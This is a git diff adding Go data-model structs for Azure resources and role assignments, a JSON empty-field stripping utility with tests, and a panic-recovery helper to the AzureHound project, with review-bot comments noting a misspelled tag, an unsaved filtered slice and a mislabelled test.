+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type StorageAccount struct {
+ azure.StorageAccount
+ SubscriptionId string `json:"subscriptionId"`
+ ResourceGroupId string `json:"resourceGroupId"`
+ ResourceGroupName string `json:"resourceGroupName"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/storage-container.go b/models/storage-container.go
new file mode 100644
index 0000000..807610c
--- /dev/null
+++ b/models/storage-container.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type StorageContainer struct {
+ azure.StorageContainer
+ SubscriptionId string `json:"subscriptionId"`
+ ResourceGroupId string `json:"resourceGroupId"`
+ ResourceGroupName string `json:"resourceGroupName"`
+ StorageAccountId string `json:"storageAccountId"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/subscription-owner.go b/models/subscription-owner.go
new file mode 100644
index 0000000..2e2f22b
--- /dev/null
+++ b/models/subscription-owner.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type SubscriptionOwner struct {
+ Owner azure.RoleAssignment `json:"owner"`
+ SubscriptionId string `json:"subscriptionId"`
+}
+
+type SubscriptionOwners struct {
+ Owners []SubscriptionOwner `json:"owners"`
+ SubscriptionId string `json:"subscriptionId"`
+}
diff --git a/models/subscription-role-assignment.go b/models/subscription-role-assignment.go
new file mode 100644
index 0000000..4505273
--- /dev/null
+++ b/models/subscription-role-assignment.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type SubscriptionRoleAssignment struct {
+ RoleAssignment azure.RoleAssignment `json:"roleAssignment"`
+ SubscriptionId string `json:"subscriptionId"`
+}
+
+type SubscriptionRoleAssignments struct {
+ RoleAssignments []SubscriptionRoleAssignment `json:"roleAssignments"`
+ SubscriptionId string `json:"subscriptionId"`
+}
diff --git a/models/subscription-user-access-admin.go b/models/subscription-user-access-admin.go
new file mode 100644
index 0000000..f4be7e8
--- /dev/null
+++ b/models/subscription-user-access-admin.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type SubscriptionUserAccessAdmin struct {
+ UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"`
+ SubscriptionId string `json:"subscriptionId"`
+}
+
+type SubscriptionUserAccessAdmins struct {
+ UserAccessAdmins []SubscriptionUserAccessAdmin `json:"userAccessAdmins"`
+ SubscriptionId string `json:"subscriptionId"`
+}
diff --git a/models/subscription.go b/models/subscription.go
new file mode 100644
index 0000000..ac841a4
--- /dev/null
+++ b/models/subscription.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type Subscription struct {
+ azure.Subscription
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/task.go b/models/task.go
new file mode 100644
index 0000000..69614ad
--- /dev/null
+++ b/models/task.go
@@ -0,0 +1,38 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "time"
+
+type ClientTask struct {
+ ADStructureCollection bool `json:"ad_structure_collection"`
+ ClientId string `json:"client_id"`
+ CreatedAt time.Time `json:"created_at"`
+ DomainController string `json:"domain_controller"`
+ EndTime time.Time `json:"end_time"`
+ EventId int `json:"event_id"`
+ EventTitle string `json:"event_title"`
+ ExectionTime time.Time `json:"exection_time"`
+ Id int `json:"id"`
+ LocalGroupCollection bool `json:"local_group_collection"`
+ LogPath string `json:"log_path"`
+ SessionCollection bool `json:"session_collection"`
+ StartTime time.Time `json:"start_time"`
+ Status int `json:"status"`
+ UpdatedAt time.Time `json:"updated_at"`
+}
diff --git a/models/tenant.go b/models/tenant.go
new file mode 100644
index 0000000..7fed704
--- /dev/null
+++ b/models/tenant.go
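Review bot: `ExectionTime` and its tag `json:"exection_time"` in `ClientTask` look like a misspelling of "execution". If the server really emits the key with this spelling, the tag has to stay and a comment such as `// wire name is spelled "exection_time" by the API` would keep someone from correcting it later. If the server sends `execution_time` instead, encoding/json will silently leave this field at the zero time, so the tag should be checked against the API contract, which is not visible in this patch.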
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type Tenant struct {
+ azure.Tenant
+ Collected bool `json:"collected,omitempty"`
+}
diff --git a/models/update-client-request.go b/models/update-client-request.go
new file mode 100644
index 0000000..5612214
--- /dev/null
+++ b/models/update-client-request.go
@@ -0,0 +1,35 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+type UpdateClientRequest struct {
+ Address string `json:"address"`
+ Username string `json:"username"`
+ Hostname string `json:"hostname"`
+ Version string `json:"version"`
+ UserSid string `json:"usersid"`
+}
+
+type UpdateClientResponse struct {
+ ID string `json:"id"`
+ Name string `json:"name"`
+ IPAddress string `json:"ip_address"`
+ Hostname string `json:"hostname"`
+ CurrentJobID int `json:"current_job_id"`
+ CurrentJob ClientJob `json:"current_job"`
+}
diff --git a/models/user.go b/models/user.go
new file mode 100644
index 0000000..8582149
--- /dev/null
+++ b/models/user.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+type User struct {
+ azure.User
+ TenantId string `json:"tenantId"`
+ TenantName string `json:"tenantName"`
+}
diff --git a/models/utils.go b/models/utils.go
new file mode 100644
index 0000000..0e0baf6
--- /dev/null
+++ b/models/utils.go
@@ -0,0 +1,65 @@
+package models
+
+import (
+ "encoding/json"
+ "reflect"
+)
+
+func OmitEmpty(raw json.RawMessage) (json.RawMessage, error) {
+ var data map[string]any
+ if err := json.Unmarshal(raw, &data); err != nil {
+ return nil, err
+ } else {
+ StripEmptyEntries(data)
+ return json.Marshal(data)
+ }
+}
+
+func StripEmptyEntries(data map[string]any) {
+ for key, value := range data {
+ if isEmpty(reflect.ValueOf(value)) {
+ delete(data, key)
+ } else if nested, ok := value.(map[string]any); ok { // recursively strip nested maps
+ StripEmptyEntries(nested)
+ } else if slice, ok := value.([]any); ok {
+ value = make([]any, len(value.([]any)))
+ i := 0
+ for _, item := range slice {
+ if mapValue, ok := item.(map[string]any); ok {
+ StripEmptyEntries(mapValue)
+ }
+ if !isEmpty(reflect.ValueOf(item)) {
+ value.([]any)[i] = item
+ i++
+ }
+ }
+ value = value.([]any)[:i]
+ }
+
+ // Strip top level if empty post recursive strip
+ if _, ok := data[key]; ok && isEmpty(reflect.ValueOf(value)) {
+ delete(data, key)
+ }
+ }
+}
+
+func isEmpty(value reflect.Value) bool {
+ switch value.Kind() {
+ case reflect.Array, reflect.Map, reflect.Slice, reflect.String:
+ return value.Len() == 0
+ case reflect.Bool:
+ return value.Bool() == false
+ case reflect.Float32, reflect.Float64:
+ return value.Float() == 0
+ case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
+ return value.Int() == 0
+ case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64:
+ return value.Uint() == 0
+ case reflect.Interface, reflect.Pointer:
+ return value.IsNil()
+ case reflect.Invalid:
+ return true
+ default:
+ return false
+ }
+}
diff --git a/models/utils_test.go b/models/utils_test.go
new file mode 100644
index 0000000..ec3a7d1
--- /dev/null
+++ b/models/utils_test.go
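Review bot: In the `[]any` branch of `StripEmptyEntries` the compacted slice is only assigned to the loop variable `value` and never stored back, so `data[key]` keeps its original elements unless the filtered result is completely empty. A slice in which some but not all entries were emptied therefore still carries `{}` (or `""`, `0`) entries in `OmitEmpty`'s output; adding `data[key] = value` directly after `value = value.([]any)[:i]` fixes that. The slice subtests in `utils_test.go` only use single-element slices, so they pass either way, and a two-element case with one empty map would pin the behaviour. Separately, `isEmpty` treats `false` and `0` as empty, so a consumer of the output cannot tell an explicit `false` from a property that was never collected, which deserves a doc comment on `OmitEmpty`.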
@@ -0,0 +1,228 @@ +package models_test + +import ( + "encoding/json" + "testing" + + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/stretchr/testify/require" +) + +type Foo struct { + Bar string +} + +func TestStripEmptyEntries(t *testing.T) { + t.Run("should omit empty basic types", func(t *testing.T) { + var pointer *Foo + + data := map[string]any{ + "array": [0]any{}, + "map": map[string]any{}, + "slice": []any{}, + "string": "", + "bool": false, + "float32": float32(0), + "float64": float64(0), + "int": int(0), + "int8": int8(0), + "int16": int16(0), + "int32": int32(0), + "int64": int64(0), + "uint": uint(0), + "uint8": uint8(0), + "uint16": uint16(0), + "uint32": uint32(0), + "uint64": uint64(0), + "pointer": pointer, + "nil": nil, + } + + require.NotEmpty(t, data) + models.StripEmptyEntries(data) + require.Empty(t, data) + }) + + t.Run("should not omit non-empty basic types", func(t *testing.T) { + data := map[string]any{ + "array": [1]any{1}, + "map": map[any]any{"foo": "bar"}, + "slice": []any{1}, + "string": "foo", + "bool": true, + "float32": float32(1), + "float64": float64(1), + "int": int(1), + "int8": int8(1), + "int16": int16(1), + "int32": int32(1), + "int64": int64(1), + "uint": uint(1), + "uint8": uint8(1), + "uint16": uint16(1), + "uint32": uint32(1), + "uint64": uint64(1), + "pointer": &Foo{}, + } + + require.NotEmpty(t, data) + numKeys := len(data) + models.StripEmptyEntries(data) + require.NotEmpty(t, data) + require.Equal(t, numKeys, len(data)) + }) + + t.Run("should not omit empty struct types", func(t *testing.T) { + data := map[string]any{ + "struct": Foo{Bar: "baz"}, + } + + require.NotEmpty(t, data) + numKeys := len(data) + models.StripEmptyEntries(data) + require.NotEmpty(t, data) + require.Equal(t, numKeys, len(data)) + require.NotEmpty(t, data["struct"]) + require.Equal(t, data["struct"].(Foo).Bar, "baz") + }) + + t.Run("should recursively strip non-empty, nested map[string]any entries", func(t *testing.T) { + data := 
map[string]any{ + "empty": map[string]any{ + "false": false, + "emptystring": "", + "emptynest": map[string]any{ + "false": false, + "emptystring": "", + }, + }, + "nonempty": map[string]any{ + "emptyprop": 0, + "nonemptyprop": 1, + }, + } + + models.StripEmptyEntries(data) + require.Nil(t, data["empty"]) + require.NotNil(t, data["nonempty"]) + require.IsType(t, map[string]any{}, data["nonempty"]) + nested := data["nonempty"].(map[string]any) + require.Equal(t, 1, len(nested)) + require.Nil(t, nested["emptyprop"]) + require.Equal(t, 1, nested["nonemptyprop"]) + }) + + t.Run("should strip empty slice entries of type map[string]any", func(t *testing.T) { + data := map[string]any{ + "empty": []any{ + map[string]any{ + "false": false, + "emptystring": "", + }, + }, + "emptynestedslice": []any{ + map[string]any{ + "nestedslice": []any{ + map[string]any{ + "false": false, + "emptystring": "", + }, + }, + "emptystring": "", + }, + }, + "nonempty": []any{ + map[string]any{ + "emptyprop": 0, + "nonemptyprop": 1, + }, + }, + } + + models.StripEmptyEntries(data) + require.Nil(t, data["empty"]) + require.Nil(t, data["emptynestedslice"]) + require.NotNil(t, data["nonempty"]) + require.IsType(t, []any{}, data["nonempty"]) + slice := data["nonempty"].([]any) + require.IsType(t, map[string]any{}, slice[0]) + entry := slice[0].(map[string]any) + require.Nil(t, entry["emptyprop"]) + require.Equal(t, 1, entry["nonemptyprop"]) + }) +} + +func TestOmitEmpty(t *testing.T) { + t.Run("should omit empty basic types", func(t *testing.T) { + data := json.RawMessage(`{ + "string": "", + "number": 0, + "object": {}, + "array": [], + "boolean": false, + "null": null + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{}`, string(filtered)) + }) + + t.Run("should not omit non-empty basic types except empty structs", func(t *testing.T) { + data := json.RawMessage(`{ + "string": "foo", + "number": 1, + "object": { "bar": "" }, + "array": [1], + "boolean": 
true + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{"array":[1],"boolean":true,"number":1,"string":"foo"}`, string(filtered)) + }) + + t.Run("should omit empty struct/object types, just their empty properties", func(t *testing.T) { + data := json.RawMessage(`{ + "object": { "bar": "" } + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{}`, string(filtered)) + }) + + t.Run("should recursively strip non-empty, nested object entries", func(t *testing.T) { + data := json.RawMessage(`{ + "empty": {}, + "nonempty": { + "emptyprop": 0, + "nonemptyprop": 1 + } + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{"nonempty":{"nonemptyprop":1}}`, string(filtered)) + }) + + t.Run("should strip non-empty array entries of type object", func(t *testing.T) { + data := json.RawMessage(`{ + "empty": [], + "nonempty": [{ + "emptyprop": 0, + "nonemptyprop": 1 + }] + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{"nonempty":[{"nonemptyprop":1}]}`, string(filtered)) + }) + + t.Run("should return an error", func(t *testing.T) { + invalidJson := json.RawMessage(`{]}`) + _, err := models.OmitEmpty(invalidJson) + require.Error(t, err) + }) +} diff --git a/models/virtual-machine-admin-login.go b/models/virtual-machine-admin-login.go new file mode 100644 index 0000000..8016879 --- /dev/null +++ b/models/virtual-machine-admin-login.go 
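Review bot: The subtest "should not omit empty struct types" passes `Foo{Bar: "baz"}`, which is not an empty struct, so the behaviour its name describes is never exercised. Using `"struct": Foo{},` and asserting that the key survives, for example `require.Contains(t, data, "struct")`, would pin the `default: return false` arm of `isEmpty` for zero-value structs.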
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type VirtualMachineAdminLogin struct {
+ AdminLogin azure.RoleAssignment `json:"adminLogin"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
+
+type VirtualMachineAdminLogins struct {
+ AdminLogins []VirtualMachineAdminLogin `json:"adminLogins"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
diff --git a/models/virtual-machine-avere-contributor.go b/models/virtual-machine-avere-contributor.go
new file mode 100644
index 0000000..8898b2c
--- /dev/null
+++ b/models/virtual-machine-avere-contributor.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type VirtualMachineAvereContributor struct {
+ AvereContributor azure.RoleAssignment `json:"avereContributor"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
+
+type VirtualMachineAvereContributors struct {
+ AvereContributors []VirtualMachineAvereContributor `json:"avereContributors"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
diff --git a/models/virtual-machine-contributor.go b/models/virtual-machine-contributor.go
new file mode 100644
index 0000000..79492ad
--- /dev/null
+++ b/models/virtual-machine-contributor.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type VirtualMachineContributor struct {
+ Contributor azure.RoleAssignment `json:"contributor"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
+
+type VirtualMachineContributors struct {
+ Contributors []VirtualMachineContributor `json:"contributors"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
diff --git a/models/virtual-machine-owner.go b/models/virtual-machine-owner.go
new file mode 100644
index 0000000..d251188
--- /dev/null
+++ b/models/virtual-machine-owner.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type VirtualMachineOwner struct {
+ Owner azure.RoleAssignment `json:"owner"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
+
+type VirtualMachineOwners struct {
+ Owners []VirtualMachineOwner `json:"owners"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
diff --git a/models/virtual-machine-role-assignment.go b/models/virtual-machine-role-assignment.go
new file mode 100644
index 0000000..51fdf6e
--- /dev/null
+++ b/models/virtual-machine-role-assignment.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type VirtualMachineRoleAssignment struct {
+ RoleAssignment azure.RoleAssignment `json:"roleAssignment"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
+
+type VirtualMachineRoleAssignments struct {
+ RoleAssignments []VirtualMachineRoleAssignment `json:"roleAssignments"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
diff --git a/models/virtual-machine-user-access-admin.go b/models/virtual-machine-user-access-admin.go
new file mode 100644
index 0000000..b282599
--- /dev/null
+++ b/models/virtual-machine-user-access-admin.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type VirtualMachineUserAccessAdmin struct {
+ UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
+
+type VirtualMachineUserAccessAdmins struct {
+ UserAccessAdmins []VirtualMachineUserAccessAdmin `json:"userAccessAdmins"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
diff --git a/models/virtual-machine-vmcontributor.go b/models/virtual-machine-vmcontributor.go
new file mode 100644
index 0000000..56baca3
--- /dev/null
+++ b/models/virtual-machine-vmcontributor.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type VirtualMachineVMContributor struct {
+ VMContributor azure.RoleAssignment `json:"vmContributor"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
+
+type VirtualMachineVMContributors struct {
+ VMContributors []VirtualMachineVMContributor `json:"vmContributors"`
+ VirtualMachineId string `json:"virtualMachineId"`
+}
diff --git a/models/virtual-machine.go b/models/virtual-machine.go
new file mode 100644
index 0000000..e293561
--- /dev/null
+++ b/models/virtual-machine.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type VirtualMachine struct {
+ azure.VirtualMachine
+ SubscriptionId string `json:"subscriptionId"`
+ ResourceGroupId string `json:"resourceGroupId"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/vm-scale-set.go b/models/vm-scale-set.go
new file mode 100644
index 0000000..4c392ba
--- /dev/null
+++ b/models/vm-scale-set.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type VMScaleSet struct {
+ azure.VMScaleSet
+ SubscriptionId string `json:"subscriptionId"`
+ ResourceGroupId string `json:"resourceGroupId"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/models/web-app.go b/models/web-app.go
new file mode 100644
index 0000000..46be3c7
--- /dev/null
+++ b/models/web-app.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import "github.com/bloodhoundad/azurehound/v2/models/azure"
+
+type WebApp struct {
+ azure.WebApp
+ SubscriptionId string `json:"subscriptionId"`
+ ResourceGroupId string `json:"resourceGroupId"`
+ ResourceGroupName string `json:"resourceGroupName"`
+ TenantId string `json:"tenantId"`
+}
diff --git a/panicrecovery/panic_recovery.go b/panicrecovery/panic_recovery.go
new file mode 100644
index 0000000..3cbd757
--- /dev/null
+++ b/panicrecovery/panic_recovery.go
@@ -0,0 +1,33 @@
+package panicrecovery
+
+import (
+ "context"
+ "fmt"
+ "runtime/debug"
+
+ "github.com/go-logr/logr"
+)
+
+var PanicChan = make(chan error)
+
+// handleBubbledPanic receives errors from panicChan, then it will print them and stop() context.
+func HandleBubbledPanic(ctx context.Context, stop context.CancelFunc, log logr.Logger) {
+ go func() {
+ for {
+ select {
+ case err := <-PanicChan:
+ log.V(0).Error(err, "")
+ stop()
+ case <-ctx.Done():
+ return
+ }
+ }
+ }()
+}
+
+// panicRecovery recovers from panics and sends them to panicChan
+func PanicRecovery() {
+ if recovery := recover(); recovery != nil {
+ PanicChan <- fmt.Errorf("[panic recovery] %s - [stack trace] %s", recovery, debug.Stack())
+ }
+}
